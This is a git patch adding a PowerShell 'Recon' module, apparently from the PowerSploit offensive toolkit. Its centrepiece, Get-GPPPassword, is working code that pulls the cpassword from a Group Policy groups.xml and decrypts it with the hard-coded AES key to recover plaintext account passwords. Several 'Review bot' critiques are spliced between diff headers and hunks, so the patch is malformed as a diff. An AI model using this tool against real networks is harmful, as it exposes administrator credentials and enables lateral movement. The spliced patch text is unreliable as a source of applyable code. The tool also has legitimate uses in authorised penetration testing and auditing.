From b53b6a03a5d29a8145dc590d5945b41fe5ae07f7 Mon Sep 17 00:00:00 2001
From: bitform
Date: Sun, 20 Jan 2013 21:32:27 -0500
Subject: Added 'Recon' Module
---
 Recon/Get-GPPPassword.ps1 | 98 +++++++++++++++++++++++++++++++++++++++++++++++
 Recon/Recon.psd1 | 88 ++++++++++++++++++++++++++++++++++++++++++
 Recon/Recon.psm1 | 1 +
 Recon/Usage.md | 12 ++++++
 4 files changed, 199 insertions(+)
 create mode 100644 Recon/Get-GPPPassword.ps1
 create mode 100644 Recon/Recon.psd1
 create mode 100644 Recon/Recon.psm1
 create mode 100644 Recon/Usage.md
diff --git a/Recon/Get-GPPPassword.ps1 b/Recon/Get-GPPPassword.ps1
new file mode 100644
index 0000000..99a694b
--- /dev/null
+++ b/Recon/Get-GPPPassword.ps1
@@ -0,0 +1,98 @@
+function Get-GPPPassword {
+
+<#
+.Synopsis
+
+ Get-GPPPassword retrieves the plaintext password for accounts pushed through Group Policy in groups.xml.
+ Author: Chris Campbell (@obscuresec)
+ License: BSD 3-Clause
+
+.Description
+
+ Get-GPPPassword imports the encoded and encrypted password string from groups.xml and then decodes and decrypts the plaintext password.
+
+.Parameter Path
+
+ The path to the targeted groups.xml file.
+
+.Example
+
+ Get-GPPPassword -path c:\demo\groups.xml
+
+.Link
+
+ http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
+ http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
+#>
+
+Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Path = "$PWD\groups.xml" )
+
+ #Function to pull encrypted password string from groups.xml
+ function Parse-cPassword {
+
+ try {
+ [xml] $Xml = Get-Content ($Path)
+ [String] $Cpassword = $Xml.Groups.User.Properties.cpassword
+ } catch { Write-Error "No Password Policy Found in File!" }
+
+ return $Cpassword
+ }
+
+ #Function to look to see if the administrator account is given a newname
+ function Parse-NewName {
+
+ [xml] $Xml = Get-Content ($Path)
+ [String] $NewName = $Xml.Groups.User.Properties.newName
+
+ return $NewName
+ }
+
+ #Function to parse out the Username whose password is being specified
+ function Parse-UserName {
+
+ try {
+ [xml] $Xml = Get-Content ($Path)
+ [string] $UserName = $Xml.Groups.User.Properties.userName
+ } catch { Write-Error "No Username Specified in File!" }
+
+ return $UserName
+ }
+
+ #Function that decodes and decrypts password
+ function Decrypt-Password {
+
+ try {
+ #Append appropriate padding based on string length
+ $Pad = "=" * (4 - ($Cpassword.length % 4))
+ $Base64Decoded = [Convert]::FromBase64String($Cpassword + $Pad)
+ #Create a new AES .NET Crypto Object
+ $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
+ #Static Key from http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
+ [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
+ 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
+ #Set IV to all nulls (thanks Matt) to prevent dynamic generation of IV value
+ $AesIV = New-Object Byte[]($AesObject.IV.Length)
+ $AesObject.IV = $AesIV
+ $AesObject.Key = $AesKey
+ $DecryptorObject = $AesObject.CreateDecryptor()
+ [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
+
+ return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
+ } catch { Write-Error "Decryption Failed!" }
+
+ }
+
+ $Cpassword = Parse-cPassword
+ $Password = Decrypt-Password
+ $NewName = Parse-NewName
+ $UserName = Parse-UserName
+
+ $Results = New-Object System.Object
+
+ Add-Member -InputObject $Results -type NoteProperty -name UserName -value $UserName
+ Add-Member -InputObject $Results -type NoteProperty -name NewName -value $NewName
+ Add-Member -InputObject $Results -type NoteProperty -name Password -value $Password
+
+ return $Results
+
+}
diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1
new file mode 100644
index 0000000..59c6377
--- /dev/null
+++ b/Recon/Recon.psd1
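Review bot: The padding arithmetic in Decrypt-Password, `$Pad = "=" * (4 - ($Cpassword.length % 4))`, appends four `=` characters when the cpassword length is already a multiple of 4, so `[Convert]::FromBase64String` throws and the function reports "Decryption Failed!" for a well-formed value; `$Pad = "=" * ((4 - ($Cpassword.Length % 4)) % 4)` pads only when the length actually needs it. The `catch { Write-Error ... }` in Parse-cPassword fires only when `Get-Content` or the `[xml]` cast throws, and because `Write-Error` is non-terminating the helper still returns an unset `$Cpassword`, so an unreadable or malformed file yields a second, misleading "Decryption Failed!" and a `$Results` object with empty fields rather than one clear failure; a file that parses but has no cpassword attribute never reaches that catch at all, since `[String] $Cpassword = $null` silently becomes an empty string, so a `throw` in the catch plus an explicit `if (-not $Cpassword) { throw 'No cpassword attribute found' }` after the cast would make both cases fail once and clearly. The `Param` block declares `$Path` as `Mandatory = $True` and also gives it the default `"$PWD\groups.xml"`; PowerShell never applies a default to a mandatory parameter, so one of the two should go and the .Parameter help should say which. Parse-cPassword, Parse-NewName and Parse-UserName each run `Get-Content ($Path)` and cast to `[xml]` again; reading and parsing the file once before the helpers are called removes the repeated I/O and the repeated error handling.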
@@ -0,0 +1,88 @@
+@{
+
+# Script module or binary module file associated with this manifest.
+ModuleToProcess = 'Recon.psm1'
+
+# Version number of this module.
+ModuleVersion = '1.0.0.0'
+
+# ID used to uniquely identify this module
+GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'
+
+# Author of this module
+Author = 'Matthew Graeber'
+
+# Company or vendor of this module
+CompanyName = ''
+
+# Copyright statement for this module
+Copyright = 'BSD 3-Clause'
+
+# Description of the functionality provided by this module
+Description = 'PowerSploit Reconnaissance Module'
+
+# Minimum version of the Windows PowerShell engine required by this module
+PowerShellVersion = '2.0'
+
+# Name of the Windows PowerShell host required by this module
+# PowerShellHostName = ''
+
+# Minimum version of the Windows PowerShell host required by this module
+# PowerShellHostVersion = ''
+
+# Minimum version of the .NET Framework required by this module
+# DotNetFrameworkVersion = ''
+
+# Minimum version of the common language runtime (CLR) required by this module
+# CLRVersion = ''
+
+# Processor architecture (None, X86, Amd64) required by this module
+# ProcessorArchitecture = ''
+
+# Modules that must be imported into the global environment prior to importing this module
+# RequiredModules = @()
+
+# Assemblies that must be loaded prior to importing this module
+# RequiredAssemblies = @()
+
+# Script files (.ps1) that are run in the caller's environment prior to importing this module.
+# ScriptsToProcess = ''
+
+# Type files (.ps1xml) to be loaded when importing this module
+# TypesToProcess = @()
+
+# Format files (.ps1xml) to be loaded when importing this module
+# FormatsToProcess = @()
+
+# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
+# NestedModules = @()
+
+# Functions to export from this module
+FunctionsToExport = '*'
+
+# Cmdlets to export from this module
+CmdletsToExport = '*'
+
+# Variables to export from this module
+VariablesToExport = ''
+
+# Aliases to export from this module
+AliasesToExport = ''
+
+# List of all modules packaged with this module.
+ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'})
+
+# List of all files packaged with this module
+FileList = 'Recon.psm1', 'Recon.psd1', 'Get-GPPPassword.ps1', 'Get-HttpStatus.ps1',
+ 'Invoke-ReverseDnsLookup.ps1', 'Usage.md'
+
+# Private data to pass to the module specified in RootModule/ModuleToProcess
+# PrivateData = ''
+
+# HelpInfo URI of this module
+# HelpInfoURI = ''
+
+# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
+# DefaultCommandPrefix = ''
+
+}
\ No newline at end of file
diff --git a/Recon/Recon.psm1 b/Recon/Recon.psm1
new file mode 100644
index 0000000..e5234fb
--- /dev/null
+++ b/Recon/Recon.psm1
@@ -0,0 +1 @@
+Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file
diff --git a/Recon/Usage.md b/Recon/Usage.md
new file mode 100644
index 0000000..9bfe35e
--- /dev/null
+++ b/Recon/Usage.md
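Review bot: `FileList` names 'Get-HttpStatus.ps1' and 'Invoke-ReverseDnsLookup.ps1', but the diffstat shows this commit adds only Get-GPPPassword.ps1, Recon.psm1, Recon.psd1 and Usage.md, so the manifest declares files that do not exist in the module; either trim `FileList` to the four files present or add the two scripts in the same commit. `FunctionsToExport = '*'` combined with Recon.psm1 dot-sourcing every .ps1 in the directory means the exported command set is whatever happens to be on disk rather than something declared here; `FunctionsToExport = 'Get-GPPPassword'` keeps the surface reviewable and stops stray scripts from becoming module commands. The `Copyright` field holds 'BSD 3-Clause', which is a license name rather than the copyright statement the manifest template asks for; the license belongs in `Description` or a LICENSE file alongside the module.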
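Review bot: The loader dot-sources every `*.ps1` that `Get-ChildItem` finds under `$PSScriptRoot`, so any script placed in the module directory runs at `Import-Module` time with the importer's privileges and becomes part of the module, whether or not Recon.psd1's `FileList` declares it. Dot-sourcing an explicit list, for example `. (Join-Path $PSScriptRoot 'Get-GPPPassword.ps1')` per script, ties what is loaded to what the manifest declares and makes additions visible in review. The `%` alias and the missing space before the closing brace read as interactive shorthand; `ForEach-Object { . $_.FullName }` is the usual spelling in a shipped .psm1.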
@@ -0,0 +1,12 @@
+To install this module, drop the entire Recon folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
+
+The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
+The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
+
+To use the module, type `Import-Module Recon`
+
+To see the commands imported, type `Get-Command -Module Recon`
+
+For help on each individual command, Get-Help is your friend.
+
+Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
\ No newline at end of file
-- 
cgit v1.2.3